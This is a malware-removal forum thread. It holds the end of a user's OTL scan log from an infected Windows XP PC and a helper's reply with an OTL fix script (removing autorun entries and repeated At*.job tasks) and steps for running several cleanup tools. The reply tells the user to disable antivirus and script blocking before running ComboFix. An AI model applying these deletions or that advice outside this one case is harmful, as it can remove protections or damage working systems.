O16 - DPF: {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_03)
O16 - DPF: {CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_05)
O16 - DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_07)
O16 - DPF: {CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_11)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_11)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.m...ash/swflash.cab (Shockwave Flash Object)
O16 - DPF: {EFD3EA56-234D-4240-90EA-CC9FA3AF5A01} https://care.windstr...TELControls.cab (ConnectivityTester Class)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{4B8689F4-82D6-40F3-A1C1-1A5487DCE17D}: DhcpNameServer = 192.168.1.1
O18 - Protocol\Handler\cetihpz {CF184AD3-CDCB-4168-A3F7-8E447D129300} - C:\Program Files\HP\hpcoretech\comp\hpuiprot.dll (Hewlett-Packard Company)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) - C:\WINDOWS\system32\userinit.exe (Microsoft Corporation)
O20 - HKCU Winlogon: Shell - (EXPLORER.EXE) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - Winlogon\Notify\avgrsstarter: DllName - (avgrsstx.dll) - File not found
O20 - Winlogon\Notify\igfxcui: DllName - (igfxsrvc.dll) - C:\WINDOWS\System32\igfxsrvc.dll (Intel Corporation)
O24 - Desktop WallPaper: C:\Documents and Settings\Owner\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Owner\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O28 - HKLM ShellExecuteHooks: {091EB208-39DD-417D-A5DD-7E2C2D8FB9CB} - C:\Program Files\Windows Defender\MpShHook.dll (Microsoft Corporation)
O28 - HKLM ShellExecuteHooks: {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - C:\Program Files\SUPERAntiSpyware\SASSEH.DLL (SuperAdBlocker.com)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2004/05/12 00:25:35 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O32 - AutoRun File - [2001/07/28 05:07:38 | 000,000,000 | -HS- | M] () - D:\AUTOEXEC.BAT -- [ FAT32 ]
O32 - AutoRun File - [2002/09/11 02:02:32 | 000,000,045 | -HS- | M] () - D:\Autorun.inf -- [ FAT32 ]
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\AutoRun\command - "" = M:\Autorun.exe /run
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\Shell00\Command - "" = M:\Autorun.exe /run
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\Shell01\Command - "" = M:\Autorun.exe /action
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\Shell02\Command - "" = M:\Autorun.exe /uninstall
O33 - MountPoints2\D\Shell\AutoRun\command - "" = D:\Info.exe -- [2002/09/10 20:54:58 | 000,040,960 | -HS- | M] (XSS)
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O36 - AppCertDlls: Filedstr - (C:\WINDOWS\system32\dfrgeset.dll) - File not found
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

========== Files/Folders - Created Within 30 Days ==========

[2013/01/17 11:28:28 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Owner\Recent
[2013/01/15 20:33:34 | 000,000,000 | ---D | C] -- C:\TDSSKiller_Quarantine
[2013/01/14 19:26:19 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\avast! Free Antivirus
[2013/01/14 19:26:18 | 000,021,256 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys
[2013/01/14 19:26:17 | 000,361,032 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswSP.sys
[2013/01/14 19:25:48 | 000,035,928 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys
[2013/01/14 19:25:47 | 000,054,232 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys
[2013/01/14 19:25:43 | 000,738,504 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswSnx.sys
[2013/01/14 19:25:41 | 000,097,608 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys
[2013/01/14 19:25:41 | 000,089,752 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswmon.sys
[2013/01/14 19:25:39 | 000,025,256 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys
[2013/01/14 19:23:24 | 000,041,224 | ---- | C] (AVAST Software) -- C:\WINDOWS\avastSS.scr
[2013/01/14 19:23:23 | 000,227,648 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\aswBoot.exe
[2013/01/14 19:21:10 | 000,000,000 | ---D | C] -- C:\Program Files\AVAST Software
[2013/01/14 19:21:10 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\AVAST Software
[2013/01/14 14:23:04 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\Google Chrome
[2013/01/14 14:12:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Owner\Application Data\SUPERAntiSpyware.com
[2013/01/14 14:11:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\SUPERAntiSpyware
[2013/01/10 21:14:52 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[1 C:\Documents and Settings\Owner\My Documents\*.tmp files -> C:\Documents and Settings\Owner\My Documents\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2013/01/17 15:55:12 | 000,000,362 | -H-- | M] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2013/01/17 15:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At41.job
[2013/01/17 15:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At24.job
[2013/01/17 15:17:00 | 000,000,886 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2013/01/17 14:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At39.job
[2013/01/17 14:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At14.job
[2013/01/17 14:17:00 | 000,000,882 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2013/01/17 13:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At36.job
[2013/01/17 13:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At22.job
[2013/01/17 12:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At37.job
[2013/01/17 12:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At20.job
[2013/01/17 11:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At38.job
[2013/01/17 11:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At16.job
[2013/01/17 10:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At34.job
[2013/01/17 10:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At11.job
[2013/01/17 09:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At33.job
[2013/01/17 09:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At10.job
[2013/01/17 08:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At35.job
[2013/01/17 08:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At9.job
[2013/01/17 07:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At32.job
[2013/01/17 07:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At8.job
[2013/01/17 06:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At31.job
[2013/01/17 06:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At7.job
[2013/01/17 06:02:50 | 000,000,330 | -H-- | M] () -- C:\WINDOWS\tasks\MP Scheduled Scan.job
[2013/01/17 06:00:15 | 000,000,187 | ---- | M] () -- C:\WINDOWS\System\hpsysdrv.DAT
[2013/01/17 05:59:55 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2013/01/16 20:21:48 | 527,814,656 | -HS- | M] () -- C:\hiberfil.sys
[2013/01/16 19:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At46.job
[2013/01/16 19:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At17.job
[2013/01/16 18:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At42.job
[2013/01/16 18:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At13.job
[2013/01/16 17:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At40.job
[2013/01/16 17:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At15.job
[2013/01/16 16:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At44.job
[2013/01/16 16:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At23.job
[2013/01/15 20:46:15 | 000,000,795 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
[2013/01/15 06:30:30 | 000,001,842 | ---- | M] () -- C:\Documents and Settings\Owner\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2013/01/15 05:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At30.job
[2013/01/15 05:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At5.job
[2013/01/15 04:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At26.job
[2013/01/15 04:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At4.job
[2013/01/15 03:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At29.job
[2013/01/15 03:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At3.job
[2013/01/15 02:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At27.job
[2013/01/15 02:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At1.job
[2013/01/15 01:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At28.job
[2013/01/15 01:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At2.job
[2013/01/15 00:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At25.job
[2013/01/15 00:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At6.job
[2013/01/14 23:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At45.job
[2013/01/14 23:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At18.job
[2013/01/14 22:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At43.job
[2013/01/14 22:32:01 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At12.job
[2013/01/14 21:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At48.job
[2013/01/14 21:32:02 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At19.job
[2013/01/14 20:48:07 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At47.job
[2013/01/14 20:32:06 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At21.job
[2013/01/14 19:26:20 | 000,001,700 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\avast! Free Antivirus.lnk
[2013/01/14 19:25:43 | 000,002,625 | ---- | M] () -- C:\WINDOWS\System32\CONFIG.NT
[2013/01/14 14:23:04 | 000,001,824 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk
[2013/01/14 14:11:21 | 000,001,689 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\SUPERAntiSpyware Free Edition.lnk
[2013/01/10 03:19:17 | 000,472,854 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2013/01/10 03:19:17 | 000,079,394 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2012/12/21 03:18:57 | 000,186,608 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[1 C:\Documents and Settings\Owner\My Documents\*.tmp files -> C:\Documents and Settings\Owner\My Documents\*.tmp -> ]

========== Files Created - No Company Name ==========

[2013/01/16 06:09:36 | 527,814,656 | -HS- | C] () -- C:\hiberfil.sys
[2013/01/14 19:26:20 | 000,001,700 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\avast! Free Antivirus.lnk
[2013/01/14 19:25:47 | 000,000,362 | -H-- | C] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2013/01/14 14:23:04 | 000,001,842 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2013/01/14 14:23:03 | 000,001,824 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk
[2013/01/14 14:11:21 | 000,001,689 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\SUPERAntiSpyware Free Edition.lnk
[2012/02/15 01:03:58 | 000,003,072 | ---- | C] () -- C:\WINDOWS\System32\iacenc.dll
[2011/12/21 10:45:18 | 000,000,000 | ---- | C] () -- C:\WINDOWS\SETUP32.INI
[2011/10/19 20:54:03 | 000,103,511 | ---- | C] () -- C:\WINDOWS\hpoins04.dat
[2011/10/19 20:54:03 | 000,017,176 | ---- | C] () -- C:\WINDOWS\hpomdl04.dat
[2011/10/19 16:12:36 | 000,103,511 | ---- | C] () -- C:\WINDOWS\hpoins04.dat.temp
[2011/10/19 16:12:36 | 000,017,176 | ---- | C] () -- C:\WINDOWS\hpomdl04.dat.temp
[2010/10/22 18:49:43 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\Owner\Local Settings\Application Data\prvlcl.dat
[2009/02/08 15:19:00 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\Owner\Ÿ9Ÿ9
[2008/07/06 09:57:36 | 000,004,630 | ---- | C] () -- C:\Documents and Settings\Owner\r
[2008/05/25 13:48:56 | 000,000,041 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\.zreglib
[2008/04/30 08:57:22 | 000,000,310 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\APUSet.xml
[2008/04/30 08:57:21 | 000,006,467 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\PrimoPDFSet.xml
[2008/03/28 09:05:33 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\Owner\USB
[2007/12/23 06:30:34 | 000,000,374 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\internaldb6334.dat
[2007/12/23 06:30:25 | 000,000,555 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\internaldb8467.dat
[2007/12/23 06:30:24 | 000,018,432 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\internaldb41.dat
[2007/11/21 15:58:51 | 000,007,680 | ---- | C] () -- C:\Documents and Settings\Owner\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2004/05/12 06:23:18 | 000,000,128 | ---- | C] () -- C:\Documents and Settings\Owner\Local Settings\Application Data\fusioncache.dat
[2004/05/12 00:44:45 | 000,015,619 | ---- | C] () -- C:\Documents and Settings\Owner\ml1.srt
[2004/05/12 00:44:45 | 000,015,420 | ---- | C] () -- C:\Documents and Settings\Owner\ml2.srt

========== ZeroAccess Check ==========

[2004/05/12 01:11:21 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\System32\shdocvw.dll -- [2008/04/13 18:12:05 | 001,499,136 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = C:\WINDOWS\System32\wbem\fastprox.dll -- [2009/02/09 06:10:48 | 000,473,600 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = C:\WINDOWS\System32\wbem\wbemess.dll -- [2008/04/13 18:12:08 | 000,273,920 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

========== LOP Check ==========

[2013/01/14 19:21:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\AVAST Software
[2010/12/20 18:05:41 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\AVG10
[2010/10/17 08:56:36 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\avg9
[2008/06/12 21:40:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Azureus
[2010/10/17 00:42:32 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Common Files
[2008/05/25 12:44:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\DAEMON Tools Pro
[2010/11/26 02:18:48 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\dJcLj03100
[2008/02/28 16:24:50 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\IM
[2008/02/28 16:23:40 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\IncrediMail
[2010/12/30 09:14:29 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\iNlGh06101
[2013/01/13 21:31:29 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\InstallMate
[2010/10/17 08:23:00 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\MFAData
[2008/07/25 15:07:35 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Napster
[2012/03/04 18:57:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Premium
[2007/10/15 05:55:45 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Recisio
[2010/02/13 17:31:21 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Temp
[2010/11/25 20:18:56 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\WSTB
[2008/12/19 17:57:22 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\{3276BE95_AF08_429F_A64F_CA64CB79BCF6}
[2010/10/17 10:06:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\AVG10
[2010/12/04 18:22:34 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Azureus
[2007/10/20 13:53:44 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Ceedo
[2010/11/25 19:10:58 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Ciiza
[2012/12/04 18:47:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Common Files
[2008/05/25 12:50:27 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DAEMON Tools
[2008/05/25 12:41:55 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DAEMON Tools Pro
[2011/12/20 09:27:09 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DDMSettings
[2008/09/17 19:14:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DNA
[2010/11/25 20:18:56 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Idew
[2007/10/15 07:03:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\InterMute
[2008/08/03 16:02:23 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\InterVideo
[2008/04/17 12:02:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Leadertech
[2008/04/20 21:06:15 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\MagicEffect Photo
[2008/02/08 15:39:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\MSNInstaller
[2010/11/13 08:37:49 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\PrimoPDF
[2010/05/01 14:54:25 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Safer Networking
[2004/05/12 06:05:09 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\SampleView
[2009/02/09 23:37:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Template
[2010/12/22 19:11:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\WinPatrol

========== Purity Check ==========

< End of report >

#2
RKinner

Posted 17 January 2013 - 10:13 PM

Malware Expert

Expert
24,624 posts

Copy the text in the code box by highlighting and Ctrl + c


:OTL
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - No CLSID value found.
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
O3 - HKLM\..\Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKCU\..\Toolbar\ShellBrowser: (no name) - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - No CLSID value found.
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_11)
O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} http://fpdownload.ma...t/ultrashim.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_03)
O16 - DPF: {CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_05)
O16 - DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_07)
O16 - DPF: {CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_11)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_11)
O32 - AutoRun File - [2001/07/28 05:07:38 | 000,000,000 | -HS- | M] () - D:\AUTOEXEC.BAT -- [ FAT32 ]
O32 - AutoRun File - [2002/09/11 02:02:32 | 000,000,045 | -HS- | M] () - D:\Autorun.inf -- [ FAT32 ]
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\AutoRun\command - "" = M:\Autorun.exe /run
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\Shell00\Command - "" = M:\Autorun.exe /run
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\Shell01\Command - "" = M:\Autorun.exe /action
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\Shell02\Command - "" = M:\Autorun.exe /uninstall
O33 - MountPoints2\D\Shell\AutoRun\command - "" = D:\Info.exe -- [2002/09/10 20:54:58 | 000,040,960 | -HS- | M] (XSS) = E:\LaunchU3.exe -a

:files
at /c
C:\WINDOWS\tasks\At*.job

:Commands
[EMPTYFLASH]
[EMPTYJAVA]
[purity]
[Reboot]

then Double on OTL to start. Under the Custom Scans/Fixes box at the bottom, paste (ctrl +v) the text. Verify that you got it all and Then click the RUN FIX button (NOT THE QUICK SCAN button!) at the top
Let the program run unhindered, OTL will reboot the PC when it is done. Save the log and copy and paste it into a reply.

Download Flash_Disinfector.exe by sUBs
http://download.blee...Disinfector.exe
and save it to your desktop.

* Double-click Flash_Disinfector.exe to run it and follow any prompts that may appear.
* The utility may ask you to insert your flash drive and/or other removable drives. Please do so and allow the utility to clean up those drives as well.
* Wait until it has finished scanning and then exit the program.
* Reboot your computer when done.

Note: Flash_Disinfector will create a hidden folder named autorun.inf in each partition and every USB drive plugged in when you ran it. Don't delete this folder...it will help protect your drives from future infection.

Download aswMBR.exe to your desktop.
Double click aswMBR.exe
uncheck trace disk IO calls
Click the "Scan" button to start scan (Accept the Avast Engine)
On completion of the scan if the Fix button is enabled (not the FixMBR button) press it and then run a new scan and click save log, save it to your desktop and post in your next reply
If the Fix button is not enabled then just click save log, save it to your desktop and post in your next reply

ComboFix

:!: It must be saved to your desktop, do not run it from your browser:!:

:!: Disable your Antivirus software when downloading or running Combofix. If it has Script Blocking features, please disable these as well. See: http://www.bleepingc...opic114351.html

Download and Save this file -- to your Desktop -- from either of these two sources:
http://download.blee...Bs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Double click on ComboFix to start the program.

* :!: Important: Have no other programs running. Your Task Bar should be clear of any program entries including your Browser.

* A window may open with a series of Disclaimers. Accept the Disclaimers to start the fix.

A caution - Do not run Combofix more than once. Do not touch your mouse/keyboard until the scan has completed, as this may cause the process to stall or your computer to lock. The scan will temporarily disable your desktop, and if interrupted may leave your desktop disabled. If this occurs, please reboot to restore the desktop. Even when ComboFix appears to be doing nothing, look at your Drive light. If it is flashing, Combofix is still at work.

A file will be created at => C:\Combofix.txt. I'll need to see that in your reply.

Download TDSSKiller:
http://support.kaspe.../tdsskiller.exe
Save it to your desktop then run it.
Double click on TDSSKiller.exe and to start the program.

If TDSSKiller alerts you that the system needs to reboot, please consent.

Run TDSSKiller again but this time:
before you hit the Scan hit Change Parameters and check the two items under Additional Options. OK then Scan.
In this mode it is prone to false positives so do not change the SKIP option to DELETE unless it says TDSS.
When done, a log file should be created on your C: drive named "TDSSKiller.txt" please copy and paste the contents in your next reply.

Malwarebytes' Anti-Malware
:!: If you have a previous version of MalwareBytes', remove it via Add or Remove Programs and download a fresh copy. :!:
http://www.malwareby...lwarebytes_free

SAVE Malwarebytes' Anti-Malware to your desktop.

* Double-click mbam-setup.exe to start the program.
* follow the prompts to install the program.
* At the end, be sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
* If an update is found, it will download and install the latest version.
* Once the program has loaded, select Perform quick scan, then click Scan.
* When the scan is complete, click OK, then Show Results to view the results.

* Be sure that everything is checked, and click Remove Selected.

* When completed, a log will open in Notepad. Please save it to a convenient location.
* The log can also be found here:
C:\Documents and Settings\Username\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\mbam-log-date (time).txt
* Post that log back here.

Right click on (My) Computer and select Manage (Continue) Then the Event Viewer. Next select Windows Logs. Right click on System and Clear Log, Clear. Repeat for Application.

Reboot.

1. Please download the Event Viewer Tool by Vino Rosso
http://images.malwar...om/vino/VEW.exe
and save it to your Desktop:
2. Double-click VEW.exe
3. Under 'Select log to query', select:

* System
4. Under 'Select type to list', select:
* Error
* Warning

Then use the 'Number of events' as follows:

1. Click the radio button for 'Number of events'
Type 20 in the 1 to 20 box
Then click the Run button.
Notepad will open with the output log.

Please post the Output log in your next reply then repeat but select Application.

Copy the text in the code box:

DRIVES
nnetsvcs
%SYSTEMDRIVE%\*.exe
%systemroot%\assembly\GAC_32\*.ini
%systemroot%\assembly\GAC_64\*.ini
msconfig
safebootminimal
safebootnetwork
activex
drivers32
%SYSTEMDRIVE%\*.exe
%ALLUSERSPROFILE%\Application Data\*.exe
%APPDATA%\*.
/md5start
pnrpnsp.dll 
nwprovau.dll
nlaapi.dll
napinsp.dll
mswsock.dll
winrnr.dll
wshelper.dll
services.exe
atapi.sys
explorer.exe
